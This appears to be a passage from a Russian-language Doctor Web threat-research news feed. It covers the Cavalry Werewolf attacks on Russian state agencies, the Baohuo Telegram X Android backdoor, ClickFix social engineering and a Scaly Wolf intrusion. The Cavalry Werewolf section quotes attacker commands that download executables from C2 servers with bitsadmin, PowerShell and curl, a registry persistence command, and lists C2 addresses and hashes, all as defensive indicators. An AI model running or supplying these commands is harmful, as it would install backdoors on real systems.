В настоящее время вредоносная деятельность Trojan.ChimeraWire фактически сводится к выполнению относительно простых задач кликера по накрутке популярности веб-сайтов. Вместе с тем, функциональные возможности лежащих в его основе утилит позволяют трояну решать более широкий спектр задач — в том числе совершать автоматизированные действия под видом активности настоящих пользователей. Так, с его помощью злоумышленники могут заполнять веб-формы — например, на сайтах, проводящих опросы в рекламных целях. Кроме того, они могут использовать его для считывания содержимого веб-страниц и создания их скриншотов — как с целью кибершпионажа, так и для автоматического сбора информации для наполнения различных баз данных (например, с почтовыми адресами, номерами телефонов и т. п.).

Таким образом, в будущем возможно появление новых версий Trojan.ChimeraWire, где эти и другие функции будут реализованы в полной мере. Специалисты компании «Доктор Веб» продолжают следить за развитием этого трояна.

MITRE ATT&CK®

Мы проанализировали Trojan.ChimeraWire по фреймворку MITRE ATT&CK®, который представляет собой матрицу с описанием тактик и техник киберпреступников, атакующих информационные системы. В результате были выявлены следующие ключевые техники:

Этап	Техника
Выполнение	Выполнение с участием пользователя (T1204) Вредоносный файл (T1204.002) Вредоносная библиотека (T1204.005) PowerShell (T1059.001) Командная оболочка Windows (T1059.003) Visual Basic (T1059.005) Python (T1059.006) Планировщик заданий Windows (T1053.005)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) Запланированная задача / задание (T1053)
Повышение привилегий	Перехват потока исполнения: перехват поиска DLL (T1574.001) Обход контроля учетных записей (T1548.002)
Предотвращение обнаружения	Зашифрованный / закодированный файл (T1027.013) Уклонение от отладки (T1622) Скрытое окно (T1564.003) Исключения для файла или пути (T1564.012) Деобфускация / декодирование файлов или данных (T1140) Перехват потока исполнения: перехват поиска DLL (T1574.001)
Организация управления	Двусторонняя связь (T1102.002) Веб-протоколы (T1071.001)

Индикаторы компрометации

Хакерская группировка Cavalry Werewolf атакует российские государственные учреждения

Thu, 06 Nov 2025 00:00:00 GMT

Скачать PDF

6 ноября 2025 года

Введение

В июле 2025 года в компанию «Доктор Веб» обратился клиент из государственного сектора Российской Федерации с подозрением о возможной компрометации внутренней сети. Гипотеза возникла в связи с тем, что клиент зафиксировал рассылку нежелательных сообщений с одного из корпоративных почтовых ящиков. Проведенное нашей антивирусной лабораторией расследование инцидента показало, что учреждение подверглось целевой атаке со стороны хакерской группировки, которую специалисты «Доктор Веб» идентифицировали как Cavalry Werewolf. Одной из целей кампании был сбор конфиденциальной информации и данных о конфигурации сети.

В ходе экспертизы удалось выявить ранее неизвестные вредоносные программы, в том числе инструменты с открытым исходным кодом. Среди них — различные бэкдоры, позволяющие дистанционно выполнять команды в атакуемых системах и подготовить площадку для разведки и дальнейшего закрепления в сетевой инфраструктуре.

В данном исследовании мы расскажем о выявленных инструментах хакеров Cavalry Werewolf, рассмотрим особенности группировки и характерные для злоумышленников действия в скомпрометированной сети.

Общие сведения об атаке и используемые инструменты

Для получения первоначального доступа к одному из компьютеров злоумышленники использовали распространенный вектор проникновения — фишинговые электронные письма с прикрепленным к ним вредоносным ПО, замаскированным под документы. В данном случае сообщения содержали неизвестный на момент атаки бэкдор BackDoor.ShellNET.1, который основан на ПО с открытым кодом Reverse-Shell-CS. Он позволяет дистанционно подключаться к зараженным компьютерам через обратный шелл и выполнять различные команды. Эта вредоносная программа располагалась в защищенном паролем архиве и, в зависимости от рассылки, имела различные имена.

Варианты имен файлов BackDoor.ShellNET.1
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

Пример фишингового письма с BackDoor.ShellNET.1. Атакующие предлагают потенциальной жертве ознакомиться с «документом» и указывают пароль для распаковки архива

Используя BackDoor.ShellNET.1, злоумышленники продолжили закрепление в целевой системе. Они загрузили несколько вредоносных программ через стандартное для ОС Windows средство Bitsadmin (C:\Windows\SysWOW64\bitsadmin.exe), предназначенное для управления заданиями по передаче файлов. Приложение запускалось с набором определенных ключей командной строки и от имени текущего администратора системы, как показано на примере ниже:

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

Первой из угроз, загруженных через BackDoor.ShellNET.1, была троянская программа-стилер Trojan.FileSpyNET.5. С ее помощью киберпреступники скачали хранившиеся на компьютере документы в форматах .doc, .docx, .xlsx и .pdf, текстовые файлы (.txt), а также изображения (.jpg, .png).

Затем атакующие установили бэкдор BackDoor.Tunnel.41 (представляет собой ПО с открытым исходным кодом ReverseSocks5) с целью создания SOCKS5-туннелей и незаметного подключения к компьютеру для дальнейшего выполнения на нем команд, в том числе — с возможностью установки другого вредоносного ПО.

Инструменты Cavalry Werewolf

Расследование данного инцидента позволило выявить не только указанные выше вредоносные приложения, но и множество других инструментов группировки, которые хакеры используют для проведения таргетированных атак. Отметим, что вирусописатели из Cavalry Werewolf не ограничиваются единым набором вредоносных программ и постоянно пополняют свой арсенал. Поэтому инструменты для проникновения в целевые системы, а также последующие в цепочке заражения стадии могут отличаться в зависимости от атакуемой организации.

Точка входа

Вредоносные программы в фишинговых письмах от Cavalry Werewolf являются первыми ступенями в цепочке заражения. При этом они могут быть представлены разным типом вредоносного ПО. Вирусные аналитики «Доктор Веб» выявили следующие варианты:

скрипты (BAT.DownLoader.1138);
исполняемые файлы (Trojan.Packed2.49708, Trojan.Siggen31.54011, BackDoor.Siggen2.5463, BackDoor.RShell.169, BackDoor.ReverseShell.10).

BAT.DownLoader.1138

Является пакетным файлом, который загружает в целевую систему PowerShell-бэкдор PowerShell.BackDoor.109. С его помощью злоумышленники скачивают и запускают на компьютере другие вредоносные программы.

Известные имена файлов BAT.DownLoader.1138	SHA1-хеш	С2-сервер
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

Устанавливает бэкдор BackDoor.Spy.4033, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Известные имена файлов Trojan.Packed2.49708	SHA1-хеш	С2-сервер
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

Устанавливает бэкдор BackDoor.Spy.4038, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Trojan.Siggen31.54011 функционально схож с вредоносной программой Trojan.Packed2.49708, но имеет несколько иной алгоритм извлечения полезной нагрузки.

SHA1-хеш	С2-сервер
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

Выполняет задания киберпреступников и управляется ими через Telegram-бот. Основная функциональность вредоносной программы расположена в PowerShell-коде, скрытом в ее теле.

Известные имена файлов BackDoor.Siggen2.5463	SHA1-хеш	Полезная нагрузка
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

Позволяет злоумышленникам дистанционно подключаться к зараженным компьютерам через обратный шелл для выполнения различных команд.

Известные имена файлов BackDoor.RShell.169	SHA1-хеш	С2-сервер
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

Запускает обратный шелл и обеспечивает злоумышленникам дистанционный доступ к системе.

Известные имена файлов BackDoor.ReverseShell.10	SHA1-хеш	С2-сервер
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

Последующие ступени заражения

Нами были обнаружены следующие вредоносные программы, которые могут в дальнейшем устанавливаться на зараженные устройства после компрометации:

Trojan.Inject5.57968

Троянская программа с зашифрованным в ее теле бэкдором, который позволяет атакующим загружать вредоносные приложения на зараженный компьютер. Расшифровка полезной нагрузки выполняется в несколько шагов, на одном из которых вредоносный массив данных инжектируется в процесс приложения aspnet_compiler.exe из пакета Microsoft .NET Framework. В дальнейшем полностью расшифрованный бэкдор работает в контексте процесса этого легитимного приложения.

Изучение активности Trojan.Inject5.57968 при помощи «песочницы» интерактивного анализатора угроз Dr.Web vxCube

Известные имена файлов Trojan.Inject5.57968	SHA1-хеш	С2-сервер	Полезная нагрузка
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

Бэкдор, который управляется через Telegram-бот и выполняет команды атакующих.

Известные имена файлов BackDoor.ShellNET.2	SHA1-хеш
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

Бэкдор на основе открытого ПО ReverseSocks5, запускающий обратный SOCS5-прокси в инфицированной системе для получения дистанционного доступа к компьютеру. BackDoor.ReverseProxy.1 запускается через командную строку cmd.exe с параметром -connect IP для подключения к нужному сетевому адресу. Известны модификации бэкдора с зашитыми адресами.

Выявлены следующие IP:

78[.]128.112[.]209 (указывался в параметре запуска)
96[.]9.125[.]168 (указывался в параметре запуска)
188[.]127.231[.]136 (зашит в коде)

Известные имена файлов BackDoor.ReverseProxy.1	SHA1-хеш
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

Trojan.Packed2.49862 — это троянские версии легитимных программ, в которые злоумышленники внедрили вредоносный код. Вирусные аналитики «Доктор Веб» встречали вредоносные модификации архиваторов WinRar и 7-Zip, средства разработки Visual Studio Code, текстового редактора AkelPad и ряда других приложений. Среди них, например, была программа Sumatra PDF Reader, которую киберпреступники выдавали за мессенджер MAX. Такие модификации перестают выполнять основную функциональность и при запуске инициализируют только добавленную к ним троянскую часть.

В зависимости от целей киберпреступников в этих модификациях могут скрываться самые разные вредоносные программы. Среди них:

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Известные имена файлов Trojan.Packed2.49862	SHA1-хеш	С2-сервер	Полезная нагрузка
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram-бот	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram-бот	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram-бот	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

Характерные для группировки действия внутри скомпрометированной сети

После проникновения в компьютерную инфраструктуру целевой организации злоумышленники могут выполнять различные действия по сбору данных и дальнейшему закреплению в системе.

Для получения информации о зараженном компьютере запускают команды:

whoami — получить сведения о текущем пользователе;
dir C:\\users\\<user>\\Downloads — получить список файлов в каталоге «Загрузки» текущего пользователя;
dir C:\\users\\public\\pictures\\ — получить список файлов в каталоге «Изображения» из общей директории (с целью определить какие вредоносные программы уже были загружены в систему);
ipconfig /all — получить конфигурацию сети;
net user — получить список всех пользователей в системе.

Для сбора информации о прокси-сервере и для проверки работоспособности сети используют команды:

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

Для настройки параметров сети используют:

утилиту командной строки netsh, входящую в состав ОС Windows.

Для последующей доставки вредоносных инструментов в систему используют легитимные инструменты:

PowerShell (например: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe);
Bitsadmin (например: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe);
curl (например: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe);

Для закрепления в системе:

Могут модифицировать системный реестр Windows (например: REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f).

Для запуска своих инструментов используют командный интерпретатор cmd.exe. Например:

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — для запуска BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — для запуска BackDoor.Tunnel.41.

Для удаления инструментов могут использовать PowerShell. Например:

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

Злоумышленники также могут периодически проверять доступность С2-серверов через команду ping.

Особенности группировки Cavalry Werewolf

Можно выделить следующие особенности злоумышленников из группировки Cavalry Werewolf:

предпочитают использовать ПО с открытым кодом — как в исходном виде, так и в качестве основы для собственных разработок;
основными инструментами являются различные бэкдоры с функциональностью обратного шелла, позволяющие дистанционно выполнять команды в зараженных системах;
с целью сокрытия могут встраивать вредоносный код в изначально безобидные приложения;
часто применяют Telegram API для управления зараженными компьютерами;
для распространения первой ступени заражения проводят фишинговые рассылки якобы от имени государственных структур и используют для этого скомпрометированные email-адреса;
для загрузки последующих стадий заражения на целевое устройство используют директории C:\\users\\public\\pictures, C:\\users\\public\\libraries, C:\\users\\public\\downloads.

Подробные технические описания выявленных инструментов Cavalry Werewolf находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Матрица MITRE

Этап	Техника
Первоначальный доступ	Целевой фишинг с вложением (T1566.001)
Выполнение	Выполнение с участием пользователя (T1204) PowerShell (T1059.001) Командная оболочка Windows (T1059.003)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) BITS-задачи (T1197)
Повышение привилегий	Обход контроля учетных записей (T1548.002)
Предотвращение обнаружения	BITS-задачи (T1197)
Организация управления	Внешний прокси-сервер (T1090.002) Двусторонняя связь (T1102.002)
Эксфильтрация данных	Эксфильтрация по каналу управления (T1041) Эксфильтрация через веб-службу (T1567)

Индикаторы компрометации

Серый кардинал Baohuo. Android-бэкдор захватывает учетные записи Telegram, получая над ними полный контроль

Thu, 23 Oct 2025 00:00:00 GMT

23 октября 2025 года

Компания «Доктор Веб» выявила опасный бэкдор Android.Backdoor.Baohuo.1.origin в модифицированных злоумышленниками версиях мессенджера Telegram X. Помимо возможности похищать конфиденциальные данные, включая логин и пароль пользователя, а также историю переписки, это ВПО обладает рядом уникальных особенностей. Например, чтобы предотвратить свое обнаружение и скрыть факт компрометации учетной записи, Android.Backdoor.Baohuo.1.origin умеет скрывать в списке активных сеансов Telegram подключения со сторонних устройств. Кроме того, он может добавлять и исключать пользователя из Telegram-каналов, вступать от его лица в чаты и выходить из них, также скрывая эти действия. Фактически с его помощью злоумышленники получают полный контроль над учетной записью жертвы и функциями мессенджера, а сам троян является инструментом для накрутки числа подписчиков в Telegram-каналах. Киберпреступники управляют бэкдором в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. По оценкам наших специалистов общее число устройств, зараженных Android.Backdoor.Baohuo.1.origin, превысило 58 000.

Распространение Android.Backdoor.Baohuo.1.origin началось в середине 2024 года, о чем свидетельствуют найденные при его анализе более ранние модификации. Основным способом доставки бэкдора на целевые устройства является реклама внутри мобильных приложений. Потенциальным жертвам демонстрируются объявления, в которых предлагается установить мессенджер Telegram X. При нажатии на баннер пользователи перенаправляются на вредоносные сайты, с которых и происходит загрузка троянского APK.

Эти сайты оформлены в стиле магазина приложений, а сам мессенджер позиционируется на них как площадка для удобного поиска партнера для общения и свиданий. Об этом говорят как баннеры с наложенным на них рекламным текстом о «бесплатных видеочатах» и с приглашениями «поговорить» (например, под видом скриншотов окна видеовызова), так и сочиненные злоумышленниками отзывы якобы довольных пользователей. Отметим, что на веб-страницах предусмотрена возможность выбора языка оформления, однако сами изображения при этом не меняются.

Один из вредоносных сайтов, с которых загружается троянская версия Telegram X. Потенциальным жертвам предлагается установить программу, где согласно «отзывам», легко найти партнера для общения и свиданий

В настоящее время киберпреступники подготовили типовые шаблоны с баннерами только для двух языков: португальского с ориентиром на пользователей из Бразилии, а также индонезийского. Таким образом, жители Бразилии и Индонезии являются главной целью для атакующих. В то же время нельзя исключать, что со временем интерес злоумышленников распространится и на пользователей из других стран.

Изучение сетевой инфраструктуры атакующих позволило определить масштаб их деятельности. В среднем вирусные аналитики «Доктор Веб» наблюдают порядка 20 000 активных подключений Android.Backdoor.Baohuo.1.origin. При этом общее число зараженных устройств превысило 58 000. Заражению подверглись около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.

Страны с наибольшим числом устройств, зараженных Android.Backdoor.Baohuo.1.origin (по данным антивирусной лаборатории «Доктор Веб»)

Однако Android.Backdoor.Baohuo.1.origin распространяется не только через вредоносные сайты: наши специалисты обнаружили его и в сторонних каталогах Android-приложений — например, APKPure, ApkSum и AndroidP. При этом в магазине APKPure он размещен от имени официального разработчика мессенджера, несмотря на то, что цифровые подписи оригинала и троянской модификации отличаются. Мы уведомили онлайн-площадки, в которых были найдены троянские версии Telegram X.

Модифицированный Telegram X с внедренным Android.Backdoor.Baohuo.1.origin распространялся в APKPure от имени настоящего разработчика мессенджера

Антивирусная лаборатория «Доктор Веб» выявила несколько разновидностей Android.Backdoor.Baohuo.1.origin, которые условно можно разделить на 3 основные группы модификаций Telegram X:

версии, в которых злоумышленники встроили бэкдор в основной исполняемый DEX-файл мессенджера;
версии, в которых бэкдор в виде патча динамически внедряется в исполняемый DEX-файл при помощи утилиты LSPatch;
версии, в которых бэкдор находится в отдельном DEX-файле в каталоге с ресурсами программы и загружается динамически.

Независимо от типа модификации Android.Backdoor.Baohuo.1.origin инициализируется при запуске самого мессенджера. Тот остается работоспособным и для пользователей выглядит как обычная программа. Однако в действительности злоумышленники через бэкдор полностью его контролируют и даже могут изменять логику его работы.

Когда киберпреступникам необходимо выполнить действие, которое не требует вмешательства в основную функциональность программы, используются заранее подготовленные «зеркала» необходимых методов приложения. Например, с их помощью могут отображаться фишинговые сообщения в окнах, которые внешне не будут отличаться от настоящих окон Telegram X.

Методы — это отдельные блоки кода в структуре Android-приложений, которые отвечают за выполнение тех или иных задач.

Если же действие не является стандартным для программы, то используется фреймворк Xposed, который непосредственно меняет ту или иную функциональность мессенджера через динамическую модификацию методов. В частности, с его помощью скрываются определенные чаты и авторизованные устройства, а также перехватывается содержимое буфера обмена.

Основное отличие ранних версий вредоносного приложения от актуальных — в организации управления трояном. В старых модификациях связь со злоумышленниками и получение от них заданий реализованы традиционным способом — через C2-сервер. Однако со временем вирусописатели добавили в Android.Backdoor.Baohuo.1.origin возможность отправки дополнительных команд через базу данных Redis, расширив тем самым его функциональность и обеспечив двумя независимыми каналами управления. При этом они предусмотрели дублирование новых команд и через обычный C2-сервер на случай, если база окажется недоступной. Это первый известный факт применения Redis для управления вредоносным ПО для Android.

Во время запуска Android.Backdoor.Baohuo.1.origin соединяется с начальным C2-сервером для загрузки конфигурации, которая среди прочего содержит данные для подключения к Redis. Через эту базу данных злоумышленники не только отправляют определенные команды вредоносному приложению, но и обновляют настройки трояна. В том числе они назначают адрес текущего C2-сервера, а также NPS-сервера. Последний вирусописатели используют для подключения зараженных устройств к своей внутренней сети (интранету) и превращения их в прокси для выхода в интернет.

Android.Backdoor.Baohuo.1.origin периодически связывается с C2-сервером через API-вызовы и может получать следующие задания:

загрузить на C2-сервер входящие СМС и контакты из телефонной книги зараженного устройства;
отправить на сервер содержимое буфера обмена при сворачивании мессенджера и возвращении в его окно;
получить от C2-сервера интернет-адреса для демонстрации рекламы, а также адрес сервера для скачивания обновления трояна в виде исполняемого DEX-файла;
получить ключи шифрования, которые используются при отправке некоторых данных на C2-сервер — например, содержимого буфера обмена;
запросить группу команд на сбор информации об установленных на устройстве приложениях, истории сообщений, контактах из телефонной книги устройства и об устройствах, на которых выполнен вход в Telegram (запрос выполняется с интервалом в 30 минут);
запросить у C2-сервера ссылку для скачивания обновления Telegram X;
запросить у C2-сервера конфигурацию, которая сохраняется в виде JSON-файла;
запросить информацию о базе данных Redis;
загрузить на C2-сервер информацию об устройстве при каждой сетевой активности мессенджера;
получить с C2-сервера список ботов, которые затем добавляются в список контактов Telegram;
каждые 3 минуты передавать на сервер информацию о текущих разрешениях приложения, состоянии устройства (включен ли или выключен экран, активно ли приложение), а также номер мобильного телефона с именем и паролем от учетной записи Telegram;
каждую минуту запрашивать команды в формате, аналогичном командам от базы данных Redis.

Для получения команд через Redis Android.Backdoor.Baohuo.1.origin подключается к соответствующему серверу злоумышленников, где регистрирует свой подканал — к нему в дальнейшем подключаются киберпреступники. Они публикуют в нем задания, которые бэкдор затем исполняет. Вредоносная программа может получать следующие команды:

создать черный список чатов, которые не будут отображаться пользователю в окне Telegram X;
скрыть от пользователя заданные устройства в списке авторизованных для его учетной записи;
заблокировать на заданное время отображение уведомлений от чатов из созданного черного списка;
показать окно с информацией об обновлении приложения Telegram X — при нажатии на него пользователь перенаправляется на заданный сайт;
отправить на C2-сервер информацию обо всех установленных приложениях;
сбросить на зараженном устройстве текущую сессию авторизации пользователя в Telegram;
показать окно с информацией об обновлении приложения Telegram X, где пользователю предлагается установить APK-файл (если файл отсутствует, троян предварительно скачивает его);
убрать значок Telegram Premium в интерфейсе приложения у текущего пользователя;
загрузить на C2-сервер информацию из баз данных Telegram X, в которых хранится история чатов, сообщения и другие конфиденциальные данные;
подписать пользователя на заданный Telegram-канал;
покинуть заданный Telegram-канал;
вступить от лица пользователя в Telegram-чат по указанной ссылке;
получить список устройств, на которых выполнена авторизация в Telegram;
запросить получение токена аутентификации пользователя и передать его на С2-сервер.

Отметим, что перехват данных из буфера обмена, когда пользователь сворачивает мессенджер и снова возвращается в его окно, позволяет реализовывать различные сценарии кражи конфиденциальных данных. Например, жертва может скопировать пароль или мнемоническую фразу для входа в криптокошелек, текст важного документа для отправки бизнес-партнерам по почте и т. д., а троян перехватит оставшиеся в буфере данные и передаст злоумышленникам.

Dr.Web Security Space для мобильных устройств успешно обнаруживает и удаляет известные версии бэкдора Android.Backdoor.Baohuo.1.origin, поэтому для наших пользователей он опасности не представляет.

Подробнее об Android.Backdoor.Baohuo.1.origin
Индикаторы компрометации

Как работает атака ClickFix

Wed, 22 Oct 2025 09:00:00 GMT

Пользователи по всему миру встревожены ростом волны атак ClickFix. Это разновидность социальной инженерии, при которой злоумышленники обманом подталкивают пользователя к самостоятельному запуску вредоносного кода на устройстве.

Атака начинается с визита на взломанный или поддельный сайт, где отображается предупреждение: например, что страница некорректно отображается, произошла ошибка в браузере или требуется обновление.
На экране появляется кнопка — «Исправить», «Проверить» или «Обновить». При ее появлении в буфер обмена незаметно копируется вредоносный код, то есть даже не обязательно нажимать на кнопку — копирование автоматическое. Затем пользователю предлагают вставить этот код в командную строку или окно, кликнув «Выполнить». Как только он это делает — вредоносная программа запускается и устанавливается, зачастую без участия антивируса, потому что действия исходят от самого пользователя.

Ниже представлена имитация упрощенного варианта атаки ClickFix

Во время запуска и просмотра контента в браузере неожиданно для пользователя появляется предупреждение о том, что что-то пошло не так с отображением содержимого страницы, и ошибки связаны с недавним обновлением браузера.

Для решения пользователю предлагается выполнить ряд манипуляций по исправлению данной проблемы:

Нажать кнопку исправления «Fix it!»;
Нажать правой кнопкой мыши на иконку Windows;
В списке выбрать Windows PowerShell с правами администратора;
Правой кнопкой мыши вставить код и исполнить.

При нажатии кнопки в браузере незаметно для пользователя копируется вредоносный исполняемый скрипт с последующей вставкой его в терминал PowerShell и исполнением:

Скрипт создает удаленное соединение c инфраструктурой C2, которая позволяют злоумышленникам удаленно управлять скомпрометированными системами.
В данном случае создается соединение с удаленным хостом C2, скачивается полезная нагрузка в виде исполняемого файла на хост пользователя, который предназначен для модификации файла hosts и запускается механизм его активации с последующим завершением скрипта.

На этапе запуска вредоносного файла решения Dr.Web обнаруживают его с помощью системы превентивной защиты.

Еще один распространенный вариант атаки ClickFix — мимикрирование под капчу. На экране появляется якобы легитимная проверка, а в фоновом режиме вредоносный код копируется в буфер обмена. Такая маскировка увеличивает вероятность успешной атаки, заставляя пользователей невольно взаимодействовать с вредоносным контентом и при этом думать, что они просто подтверждают свою человечность.

Следом появляется инструкция по запуску кода.

Доверчивое выполнение всех шагов открывает злоумышленнику удаленный доступ к устройству: пользователь случайно запускает вредоносный скрипт.

Почему сложно обнаружить атаку ClickFix

Когда пользователь нажимает кнопку на вредоносном сайте, никакой угрозы антивирус пока не видит. Это связано с тем, что на первом этапе все действия кажутся вполне законными: пользователь сам копирует команды, сам их вставляет и запускает — как будто делает обычные системные операции.
Обнаружение происходит позже — когда запускается вредоносный файл или код пытается встроиться в другие процессы в системе. Именно в этот момент антивирус распознает угрозу и нейтрализует ее. То есть защита срабатывает уже на так называемой постэксплуатационной стадии, когда вредоносное ПО начинает активные действия: вмешивается в защищенные процессы или ведет себя необычно.
К этому времени злоумышленник, как правило, уже подключился к системе жертвы. Это значит, что основная вредоносная нагрузка (payload) доставлена, и она может маскироваться под обычные процессы.
На этом этапе атакующий способен:

углубить свое присутствие в системе (получить больше прав),
собирать данные,
перемещаться по сети,
пытаться отключить антивирусную защиту.

Дополнительно вредоносное ПО может быть зашифровано или запутано (обфусцировано), что делает его менее заметным для стандартных механизмов защиты.

Почему важно действовать на самых ранних этапах

На этом фоне становится особенно важным не только реагировать на угрозу после ее запуска, но и предотвращать подключение злоумышленника к системе. Для этого могут использоваться такие методы, как:

проверка содержимого буфера обмена, если в браузере появляются подозрительные сообщения с командами (например, PowerShell),
анализ сетевого трафика и попыток установить подозрительные соединения,
обучение пользователей методам распознавания социальной инженерии — с разбором реальных сценариев атак.

Дубль два: Scaly Wolf с упорством желает заполучить секреты российского машиностроительного предприятия

Wed, 13 Aug 2025 04:00:00 GMT

Скачать PDF

13 августа 2025 года

В 2023 году специалисты «Доктор Веб» начали расследование таргетированной атаки на российскую компанию машиностроительного сектора, о результатах которого мы рассказали в соответствующем исследовании. По всей видимости, киберпреступники очень заинтересованы в корпоративных секретах этого предприятия, поэтому спустя два года решили вновь атаковать его. Злоумышленники вернулись с новым вредоносным ПО и стойким желанием проникнуть в IT-инфраструктуру компании, для чего использовали сразу несколько векторов атаки в попытке заразить целевые компьютеры.

Введение

В конце июня 2025 года в компанию «Доктор Веб» обратились представители российского предприятия машиностроительного сектора c просьбой выяснить, являются ли периодические срабатывания антивируса на одном из компьютеров признаком заражения или же вызваны неким сбоем. Расследование инцидента показало, что реакция антивируса оказалась штатной, а предприятие подверглось целевой атаке.

Атака началась с компьютера, на котором не был установлен антивирус Dr.Web. Отсутствие защиты на нем привело к компрометации сети и заражению еще нескольких устройств. Наши специалисты проанализировали затронутые рабочие станции и восстановили цепочку событий. В данном исследовании мы расскажем о векторе заражения и методах, которые использовали злоумышленники в рамках этой атаки.

Общие сведения об атаке и используемые инструменты

В начале мая 2025 года пострадавшая компания стала постоянно получать электронные письма якобы финансового характера. Они содержали фишинговый PDF-документ, а также защищенный паролем ZIP-архив.

Прикрепленные к одному из писем PDF-приманка и ZIP-архив

Сами письма не имели сопроводительного текста.

Пример одного из фишинговых писем

